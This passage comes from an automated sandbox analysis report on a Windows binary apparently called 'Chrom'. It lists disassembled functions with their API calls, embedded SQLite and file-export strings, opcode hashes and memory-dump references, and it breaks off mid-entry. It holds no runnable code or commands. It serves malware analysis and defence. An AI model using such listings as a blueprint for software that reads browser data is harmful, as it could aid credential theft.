                                                                                                                                                        • Associated: 00000004.00000002.1693760044.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                        • Associated: 00000004.00000002.1693803409.000000000044F000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                        • Associated: 00000004.00000002.1693817773.000000000045A000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                        • Associated: 00000004.00000002.1693817773.000000000045E000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                        • Associated: 00000004.00000002.1693845131.0000000000474000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_4_2_400000_Chrom.jbxd
                                                                                                                                                        Yara matches
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: AttributesFilefreememset
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID: 2507021081-0
                                                                                                                                                        • Opcode ID: 3f26cb4930ba2ae58a9a28ad6dda560801c2adcc14f28edc482860ed1ce7c104
                                                                                                                                                        • Instruction ID: 7395bd2a308086f3fd2d4c6b452b5aa1ac1e70db218c9d4fbfcd5f8a884c914b
                                                                                                                                                        • Opcode Fuzzy Hash: 3f26cb4930ba2ae58a9a28ad6dda560801c2adcc14f28edc482860ed1ce7c104
                                                                                                                                                        • Instruction Fuzzy Hash: B2110A7290A119FBDB21AFA48C809FF33AAEB45354B51013BF915E2284D6388DD5926F
                                                                                                                                                        Function 0041944C Relevance: 9.1, APIs: 6, Instructions: 61COMMON
                                                                                                                                                        Download Yara Rule
                                                                                                                                                        APIs
                                                                                                                                                        • AreFileApisANSI.KERNEL32 ref: 00419453
                                                                                                                                                        • MultiByteToWideChar.KERNEL32(00000001,00000000,?,000000FF,00000000,00000000), ref: 00419471
                                                                                                                                                        • malloc.MSVCRT ref: 0041947B
                                                                                                                                                        • MultiByteToWideChar.KERNEL32(00000001,00000000,?,000000FF,00000000,00000000), ref: 00419492
                                                                                                                                                        • free.MSVCRT ref: 0041949B
                                                                                                                                                        • free.MSVCRT ref: 004194B9
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000004.00000002.1693772779.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                        • Associated: 00000004.00000002.1693760044.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                        • Associated: 00000004.00000002.1693803409.000000000044F000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                        • Associated: 00000004.00000002.1693817773.000000000045A000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                        • Associated: 00000004.00000002.1693817773.000000000045E000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                        • Associated: 00000004.00000002.1693845131.0000000000474000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_4_2_400000_Chrom.jbxd
                                                                                                                                                        Yara matches
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: ByteCharMultiWidefree$ApisFilemalloc
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID: 4131324427-0
                                                                                                                                                        • Opcode ID: fd694bdbf1a5288751afab5916eb464ac1068d8597691c81853ece6260929c55
                                                                                                                                                        • Instruction ID: d2ec6eabaf1a5e80c3afeaedd941492bb30a106db416a89a7fee490f69d676c2
                                                                                                                                                        • Opcode Fuzzy Hash: fd694bdbf1a5288751afab5916eb464ac1068d8597691c81853ece6260929c55
                                                                                                                                                        • Instruction Fuzzy Hash: 5E01D472609125BBAB116AA59C01DEF379CDF463747210336FC15E3280EA28CD4242BD
                                                                                                                                                        Function 0041A0EE Relevance: 8.9, APIs: 3, Strings: 2, Instructions: 102COMMON
                                                                                                                                                        Download Yara Rule
                                                                                                                                                        APIs
                                                                                                                                                        • GetTempPathW.KERNEL32(000000E6,?,?,00419CBA), ref: 0041A132
                                                                                                                                                        • GetTempPathA.KERNEL32(000000E6,?,?,00419CBA), ref: 0041A15A
                                                                                                                                                        • free.MSVCRT ref: 0041A182
                                                                                                                                                        Strings
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000004.00000002.1693772779.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                        • Associated: 00000004.00000002.1693760044.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                        • Associated: 00000004.00000002.1693803409.000000000044F000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                        • Associated: 00000004.00000002.1693817773.000000000045A000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                        • Associated: 00000004.00000002.1693817773.000000000045E000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                        • Associated: 00000004.00000002.1693845131.0000000000474000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_4_2_400000_Chrom.jbxd
                                                                                                                                                        Yara matches
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: PathTemp$free
                                                                                                                                                        • String ID: %s\etilqs_$etilqs_
                                                                                                                                                        • API String ID: 924794160-1420421710
                                                                                                                                                        • Opcode ID: bab2ed1f527ee8a656d929be1b160a4a852a5d62a151918d7f1c5c0f436632ca
                                                                                                                                                        • Instruction ID: 86187f938b98f06affb9dfa87fa418505d5dbd7a5a9bd49ee38ced054dacd9ce
                                                                                                                                                        • Opcode Fuzzy Hash: bab2ed1f527ee8a656d929be1b160a4a852a5d62a151918d7f1c5c0f436632ca
                                                                                                                                                        • Instruction Fuzzy Hash: 8E312831A092496AE725A765DC41BFF73A89B54308F1404BFE846C2283EF7C9EC5865E
                                                                                                                                                        Function 00411618 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 59COMMON
                                                                                                                                                        Download Yara Rule
                                                                                                                                                        APIs
                                                                                                                                                        • memset.MSVCRT ref: 00411649
                                                                                                                                                          • Part of subcall function 0040A189: GetModuleFileNameW.KERNEL32(00000000,00000208,00000104,0040E194,00000000,0040E047,?,00000000,00000208,?), ref: 0040A194
                                                                                                                                                        • wcsrchr.MSVCRT ref: 00411667
                                                                                                                                                        • wcscat.MSVCRT ref: 00411681
                                                                                                                                                        Strings
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000004.00000002.1693772779.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                        • Associated: 00000004.00000002.1693760044.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                        • Associated: 00000004.00000002.1693803409.000000000044F000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                        • Associated: 00000004.00000002.1693817773.000000000045A000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                        • Associated: 00000004.00000002.1693817773.000000000045E000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                        • Associated: 00000004.00000002.1693845131.0000000000474000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_4_2_400000_Chrom.jbxd
                                                                                                                                                        Yara matches
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: FileModuleNamememsetwcscatwcsrchr
                                                                                                                                                        • String ID: .cfg$General
                                                                                                                                                        • API String ID: 776488737-1188829934
                                                                                                                                                        • Opcode ID: 05d865f8f1fbf1afa81b1740172245d7630aa72eb646d50dbed4ba79973170d9
                                                                                                                                                        • Instruction ID: 118cea2e70e189b156e6f7c6b3a683fd49b902604a6a275d9fc0e819739e64fb
                                                                                                                                                        • Opcode Fuzzy Hash: 05d865f8f1fbf1afa81b1740172245d7630aa72eb646d50dbed4ba79973170d9
                                                                                                                                                        • Instruction Fuzzy Hash: E711933250121C6ADB10EF51CC85ACA7368BF54714F1404EBE908AB142D775ABD88B99
                                                                                                                                                        Function 0040F8D7 Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 57COMMON
                                                                                                                                                        Download Yara Rule
                                                                                                                                                        APIs
                                                                                                                                                        • memset.MSVCRT ref: 0040F90E
                                                                                                                                                          • Part of subcall function 00416DE5: memcpy.MSVCRT(?,&lt;,00000008,?,?,00000000,0040F92F,?,?,?,<item>), ref: 00416E62
                                                                                                                                                          • Part of subcall function 0040F0F7: wcscpy.MSVCRT ref: 0040F0FC
                                                                                                                                                          • Part of subcall function 0040F0F7: _wcslwr.MSVCRT ref: 0040F137
                                                                                                                                                        • _snwprintf.MSVCRT ref: 0040F958
                                                                                                                                                        Strings
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000004.00000002.1693772779.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                        • Associated: 00000004.00000002.1693760044.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                        • Associated: 00000004.00000002.1693803409.000000000044F000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                        • Associated: 00000004.00000002.1693817773.000000000045A000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                        • Associated: 00000004.00000002.1693817773.000000000045E000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                        • Associated: 00000004.00000002.1693845131.0000000000474000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_4_2_400000_Chrom.jbxd
                                                                                                                                                        Yara matches
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: _snwprintf_wcslwrmemcpymemsetwcscpy
                                                                                                                                                        • String ID: <%s>%s</%s>$</item>$<item>
                                                                                                                                                        • API String ID: 1775345501-2769808009
                                                                                                                                                        • Opcode ID: 795fdbf1178cbb4566f4ded2e51011bbdab7768b91a9f779536e95c46b73b6be
                                                                                                                                                        • Instruction ID: e757c57b7439aa271c71178676e27b4ad6085045d172985a4d63abbb6152d9b4
                                                                                                                                                        • Opcode Fuzzy Hash: 795fdbf1178cbb4566f4ded2e51011bbdab7768b91a9f779536e95c46b73b6be
                                                                                                                                                        • Instruction Fuzzy Hash: D611C435600309BBDB21AF29CC82E997B25FF04708F10007AF90467A93C339F968DB88
                                                                                                                                                        Function 00416644 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 40fileCOMMON
                                                                                                                                                        Download Yara Rule
                                                                                                                                                        APIs
                                                                                                                                                        • wcscpy.MSVCRT ref: 00416653
                                                                                                                                                        • wcscpy.MSVCRT ref: 0041666E
                                                                                                                                                        • CreateFileW.KERNEL32(00000002,40000000,00000000,00000000,00000002,00000000,00000000,?,00000000,?,004116BA,?,General,?,00000000,00000001), ref: 00416695
                                                                                                                                                        • CloseHandle.KERNEL32(00000000), ref: 0041669C
                                                                                                                                                        Strings
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000004.00000002.1693772779.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                        • Associated: 00000004.00000002.1693760044.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                        • Associated: 00000004.00000002.1693803409.000000000044F000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                        • Associated: 00000004.00000002.1693817773.000000000045A000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                        • Associated: 00000004.00000002.1693817773.000000000045E000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                        • Associated: 00000004.00000002.1693845131.0000000000474000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_4_2_400000_Chrom.jbxd
                                                                                                                                                        Yara matches
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: wcscpy$CloseCreateFileHandle
                                                                                                                                                        • String ID: General
                                                                                                                                                        • API String ID: 999786162-26480598
                                                                                                                                                        • Opcode ID: ed3c1823b04d3e0c62bd7214a39938c8b74bf6441286b00033080fb2913483c2
                                                                                                                                                        • Instruction ID: f01d66d13555934190104f6a09e645eb52914f374063e62784237bdfd735f1bc
                                                                                                                                                        • Opcode Fuzzy Hash: ed3c1823b04d3e0c62bd7214a39938c8b74bf6441286b00033080fb2913483c2
                                                                                                                                                        • Instruction Fuzzy Hash: 2CF059B3109300BFF7206B619C85EAB77DCDF40318F12883FF04891141CA398C94866E
                                                                                                                                                        Function 0040DBA3 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 38COMMON
                                                                                                                                                        Download Yara Rule
                                                                                                                                                        APIs
                                                                                                                                                        • memset.MSVCRT ref: 0040DBC8
                                                                                                                                                        • GetPrivateProfileStringW.KERNEL32(0045E668,?,0044F4CC,?,00001000,0045E458), ref: 0040DBF0
                                                                                                                                                        • WritePrivateProfileStringW.KERNEL32(0045E668,?,?,0045E458), ref: 0040DC12
                                                                                                                                                        Strings
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000004.00000002.1693772779.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                        • Associated: 00000004.00000002.1693760044.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                        • Associated: 00000004.00000002.1693803409.000000000044F000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                        • Associated: 00000004.00000002.1693817773.000000000045A000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                        • Associated: 00000004.00000002.1693817773.000000000045E000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                        • Associated: 00000004.00000002.1693845131.0000000000474000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_4_2_400000_Chrom.jbxd
                                                                                                                                                        Yara matches
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: PrivateProfileString$Writememset
                                                                                                                                                        • String ID: XE$hE
                                                                                                                                                        • API String ID: 747731527-2175974288
                                                                                                                                                        • Opcode ID: ede71be8cfb000d6f647e9b079099f0124216ddcdab21ee2ea2fb028081f9ff6
                                                                                                                                                        • Instruction ID: 3f24a6620cd36916ca3736dea7931fee652e2a6ad1dc5343ab1a7f2c6f25142e
                                                                                                                                                        • Opcode Fuzzy Hash: ede71be8cfb000d6f647e9b079099f0124216ddcdab21ee2ea2fb028081f9ff6
                                                                                                                                                        • Instruction Fuzzy Hash: 81F06836950354FAFB115B51CC4DFCB3B68EB55755F004076FB04A1182D7B88A48C6AD
                                                                                                                                                        Function 00409CFB Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 31windowCOMMON
                                                                                                                                                        Download Yara Rule
                                                                                                                                                        APIs
                                                                                                                                                        • GetLastError.KERNEL32(00000000,?,004101B0,00000000,?,004122A5,00000000,00000000,?,00000000,00000000,00000000), ref: 00409D0F
                                                                                                                                                        • _snwprintf.MSVCRT ref: 00409D3C
                                                                                                                                                        • MessageBoxW.USER32(00000000,?,Error,00000030), ref: 00409D55
                                                                                                                                                        Strings
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000004.00000002.1693772779.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                        • Associated: 00000004.00000002.1693760044.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                        • Associated: 00000004.00000002.1693803409.000000000044F000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                        • Associated: 00000004.00000002.1693817773.000000000045A000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                        • Associated: 00000004.00000002.1693817773.000000000045E000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                        • Associated: 00000004.00000002.1693845131.0000000000474000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_4_2_400000_Chrom.jbxd
                                                                                                                                                        Yara matches
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: ErrorLastMessage_snwprintf
                                                                                                                                                        • String ID: Error$Error %d: %s
                                                                                                                                                        • API String ID: 313946961-1552265934
                                                                                                                                                        • Opcode ID: e1fdb32dfef422dff48cb9ab629eed33cb04251586a29e7e9f8c167c9a74f7e6
                                                                                                                                                        • Instruction ID: d9c3214ff741d8e793b5fb5d5340e1d373de9dbbbbb1b4938000c24ebbed5cab
                                                                                                                                                        • Opcode Fuzzy Hash: e1fdb32dfef422dff48cb9ab629eed33cb04251586a29e7e9f8c167c9a74f7e6
                                                                                                                                                        • Instruction Fuzzy Hash: BFF0277A51020867DB11A794CC02FDA73ACAB45796F0400BBB944A2141DAB89E488E68
                                                                                                                                                        Function 00437897 Relevance: 7.9, APIs: 1, Strings: 4, Instructions: 390COMMON
                                                                                                                                                        Download Yara Rule
                                                                                                                                                        Strings
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000004.00000002.1693772779.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                        • Associated: 00000004.00000002.1693760044.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                        • Associated: 00000004.00000002.1693803409.000000000044F000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                        • Associated: 00000004.00000002.1693817773.000000000045A000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                        • Associated: 00000004.00000002.1693817773.000000000045E000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                        • Associated: 00000004.00000002.1693845131.0000000000474000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_4_2_400000_Chrom.jbxd
                                                                                                                                                        Yara matches
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID:
                                                                                                                                                        • String ID: foreign key constraint failed$new$oid$old
                                                                                                                                                        • API String ID: 0-1953309616
                                                                                                                                                        • Opcode ID: 78d1a63a5ea67a9e42337c47af4419ff18a1c500e7b5e2e5722190ef6454fa26
                                                                                                                                                        • Instruction ID: 80b6a815d8446b075644860295f848db11862a5b470e777900e0cbaee52b5eda
                                                                                                                                                        • Opcode Fuzzy Hash: 78d1a63a5ea67a9e42337c47af4419ff18a1c500e7b5e2e5722190ef6454fa26
                                                                                                                                                        • Instruction Fuzzy Hash: 50E19FB1E04209AFDB14DFA5D881AEEBBB5FF48304F10842EE805AB351DB799A41CB55
                                                                                                                                                        Function 004350BF Relevance: 7.8, APIs: 2, Strings: 3, Instructions: 334COMMON
                                                                                                                                                        Download Yara Rule
                                                                                                                                                        APIs
                                                                                                                                                        Strings
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000004.00000002.1693772779.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                        • Associated: 00000004.00000002.1693760044.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                        • Associated: 00000004.00000002.1693803409.000000000044F000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                        • Associated: 00000004.00000002.1693817773.000000000045A000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                        • Associated: 00000004.00000002.1693817773.000000000045E000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                        • Associated: 00000004.00000002.1693845131.0000000000474000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_4_2_400000_Chrom.jbxd
                                                                                                                                                        Yara matches
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: memset
                                                                                                                                                        • String ID: VtC$VtC$rows deleted
                                                                                                                                                        • API String ID: 2221118986-3271433201
                                                                                                                                                        • Opcode ID: 285e4370a89cc5d60ce435c08b76b458e0c9e97a2273653d553d833e96bb1a07
                                                                                                                                                        • Instruction ID: 8eee3fd8308e863b15c20577b933f05ddeb2eec06ba64818cf6e3fd673dab534
                                                                                                                                                        • Opcode Fuzzy Hash: 285e4370a89cc5d60ce435c08b76b458e0c9e97a2273653d553d833e96bb1a07
                                                                                                                                                        • Instruction Fuzzy Hash: 70C1C071E00618ABDF21DF95CC42B9FBBB1EF48314F14105AF904AB282D779AE50DB99
                                                                                                                                                        Function 0043355E Relevance: 7.7, APIs: 2, Strings: 3, Instructions: 230COMMON
                                                                                                                                                        Download Yara Rule
                                                                                                                                                        APIs
                                                                                                                                                        Strings
                                                                                                                                                        • unknown column "%s" in foreign key definition, xrefs: 00433745
                                                                                                                                                        • number of columns in foreign key does not match the number of columns in the referenced table, xrefs: 004335E2
                                                                                                                                                        • foreign key on %s should reference only one column of table %T, xrefs: 004335BA
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000004.00000002.1693772779.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                        • Associated: 00000004.00000002.1693760044.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                        • Associated: 00000004.00000002.1693803409.000000000044F000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                        • Associated: 00000004.00000002.1693817773.000000000045A000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                        • Associated: 00000004.00000002.1693817773.000000000045E000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                        • Associated: 00000004.00000002.1693845131.0000000000474000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_4_2_400000_Chrom.jbxd
                                                                                                                                                        Yara matches
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: memcpy
                                                                                                                                                        • String ID: foreign key on %s should reference only one column of table %T$number of columns in foreign key does not match the number of columns in the referenced table$unknown column "%s" in foreign key definition
                                                                                                                                                        • API String ID: 3510742995-272990098
                                                                                                                                                        • Opcode ID: e4adabbe1decd632362e132ce6bab9d224831924daf4b8fb608a03f475e217cd
                                                                                                                                                        • Instruction ID: fb1fd52c892a386ff9235e04c27833661dd88198db5bdd6c779901d429b6f073
                                                                                                                                                        • Opcode Fuzzy Hash: e4adabbe1decd632362e132ce6bab9d224831924daf4b8fb608a03f475e217cd
                                                                                                                                                        • Instruction Fuzzy Hash: C6914EB5A0020ADFCB10DF59C581A9EBBF1FF48315F14815AE805AB352DB35EA41CF99
                                                                                                                                                        Function 00411224 Relevance: 7.6, APIs: 1, Strings: 4, Instructions: 86COMMON
                                                                                                                                                        Download Yara Rule
                                                                                                                                                        APIs
                                                                                                                                                        • memset.MSVCRT ref: 00411246
                                                                                                                                                          • Part of subcall function 0040D5E2: GetModuleHandleW.KERNEL32(00000000,?,?,0040E6FB,?,004121F5,00000000,00000000,?), ref: 0040D621
                                                                                                                                                          • Part of subcall function 0040D5E2: LoadStringW.USER32(00000000,0000000A,00000FFF,?), ref: 0040D6BA
                                                                                                                                                          • Part of subcall function 0040D5E2: memcpy.MSVCRT(00000000,00000002), ref: 0040D6FA
                                                                                                                                                          • Part of subcall function 0040D5E2: wcscpy.MSVCRT ref: 0040D663
                                                                                                                                                          • Part of subcall function 0040D5E2: wcslen.MSVCRT ref: 0040D681
                                                                                                                                                          • Part of subcall function 0040D5E2: GetModuleHandleW.KERNEL32(00000000,?,?,?,0040E6FB,?,004121F5,00000000,00000000,?), ref: 0040D68F
                                                                                                                                                          • Part of subcall function 0040AA19: memset.MSVCRT ref: 0040AA3A
                                                                                                                                                          • Part of subcall function 0040AA19: _snwprintf.MSVCRT ref: 0040AA6D
                                                                                                                                                          • Part of subcall function 0040AA19: wcslen.MSVCRT ref: 0040AA79
                                                                                                                                                          • Part of subcall function 0040AA19: memcpy.MSVCRT(?,?,?,?,?,00000400,%s (%s),?,?), ref: 0040AA91
                                                                                                                                                          • Part of subcall function 0040AA19: wcslen.MSVCRT ref: 0040AA9F
                                                                                                                                                          • Part of subcall function 0040AA19: memcpy.MSVCRT(?,?,?,?,?,?,?,?,?,00000400,%s (%s),?,?), ref: 0040AAB2
                                                                                                                                                          • Part of subcall function 0040A838: GetSaveFileNameW.COMDLG32(?), ref: 0040A887
                                                                                                                                                          • Part of subcall function 0040A838: wcscpy.MSVCRT ref: 0040A89E
                                                                                                                                                        Strings
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000004.00000002.1693772779.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                        • Associated: 00000004.00000002.1693760044.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                        • Associated: 00000004.00000002.1693803409.000000000044F000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                        • Associated: 00000004.00000002.1693817773.000000000045A000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                        • Associated: 00000004.00000002.1693817773.000000000045E000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                        • Associated: 00000004.00000002.1693845131.0000000000474000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_4_2_400000_Chrom.jbxd
                                                                                                                                                        Yara matches
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: memcpywcslen$HandleModulememsetwcscpy$FileLoadNameSaveString_snwprintf
                                                                                                                                                        • String ID: *.csv$*.htm;*.html$*.txt$txt
                                                                                                                                                        • API String ID: 1392923015-2111886889
                                                                                                                                                        • Opcode ID: aafac17d9ad648619bbc2820d08f5d6f77f7253f9c21e5715a78e07660b7453b
                                                                                                                                                        • Instruction ID: 21c56e8af235b710a4191330bbdd055b03883b3d4342fd00990d051e634670c5
                                                                                                                                                        • Opcode Fuzzy Hash: aafac17d9ad648619bbc2820d08f5d6f77f7253f9c21e5715a78e07660b7453b
                                                                                                                                                        • Instruction Fuzzy Hash: FE31FDB1D00258ABDB00EFE5DC816DDBBB8FB44318F20407BE945BB281DB389A458B59
                                                                                                                                                        Function 00449C90 Relevance: 7.6, APIs: 4, Strings: 1, Instructions: 84COMMON
                                                                                                                                                        Download Yara Rule
                                                                                                                                                        APIs
                                                                                                                                                        • memset.MSVCRT ref: 00449C9B
                                                                                                                                                        • memset.MSVCRT ref: 00449CAB
                                                                                                                                                        • memcpy.MSVCRT(?,?,?,00000000,?,?,00000000,00000020,?,00000000), ref: 00449D0D
                                                                                                                                                        • memcpy.MSVCRT(?,?,?,?,?,00000000,00000020,?,00000000), ref: 00449D5A
                                                                                                                                                        Strings
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000004.00000002.1693772779.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                        • Associated: 00000004.00000002.1693760044.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                        • Associated: 00000004.00000002.1693803409.000000000044F000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                        • Associated: 00000004.00000002.1693817773.000000000045A000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                        • Associated: 00000004.00000002.1693817773.000000000045E000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                        • Associated: 00000004.00000002.1693845131.0000000000474000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_4_2_400000_Chrom.jbxd
                                                                                                                                                        Yara matches
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: memcpymemset
                                                                                                                                                        • String ID: gj
                                                                                                                                                        • API String ID: 1297977491-4203073231
                                                                                                                                                        • Opcode ID: bc066ce618c8efd45368092d21e9600cda6cc543f99e188020d63ac60b6c492b
                                                                                                                                                        • Instruction ID: 1e6fb78b96cc295ab1e64a1d2520aab5d7b4c62cf2bfa8bfbbde786d8273fed9
                                                                                                                                                        • Opcode Fuzzy Hash: bc066ce618c8efd45368092d21e9600cda6cc543f99e188020d63ac60b6c492b
                                                                                                                                                        • Instruction Fuzzy Hash: D3212CF37003405BE724AA79CC81A5B779D9FCA318F06481EF6468B342E57EDA05C725
                                                                                                                                                        Function 0040B7F7 Relevance: 7.6, APIs: 4, Strings: 1, Instructions: 67COMMON
                                                                                                                                                        Download Yara Rule
                                                                                                                                                        APIs
                                                                                                                                                        • wcslen.MSVCRT ref: 0040B804
                                                                                                                                                        • free.MSVCRT ref: 0040B827
                                                                                                                                                          • Part of subcall function 00409FB3: malloc.MSVCRT ref: 00409FCF
                                                                                                                                                          • Part of subcall function 00409FB3: memcpy.MSVCRT(00000000,00000000,00000000,00000000,?,0040B018,00000002,?,00000000,?,0040B34B,00000000,?,00000000), ref: 00409FE7
                                                                                                                                                          • Part of subcall function 00409FB3: free.MSVCRT ref: 00409FF0
                                                                                                                                                        • free.MSVCRT ref: 0040B84A
                                                                                                                                                        • memcpy.MSVCRT(00000000,00000000,-00000002,00000000,00000000,?,?,?,6n@,00406D1D,6n@,00000000,?,?,00406E36,00000000), ref: 0040B86E
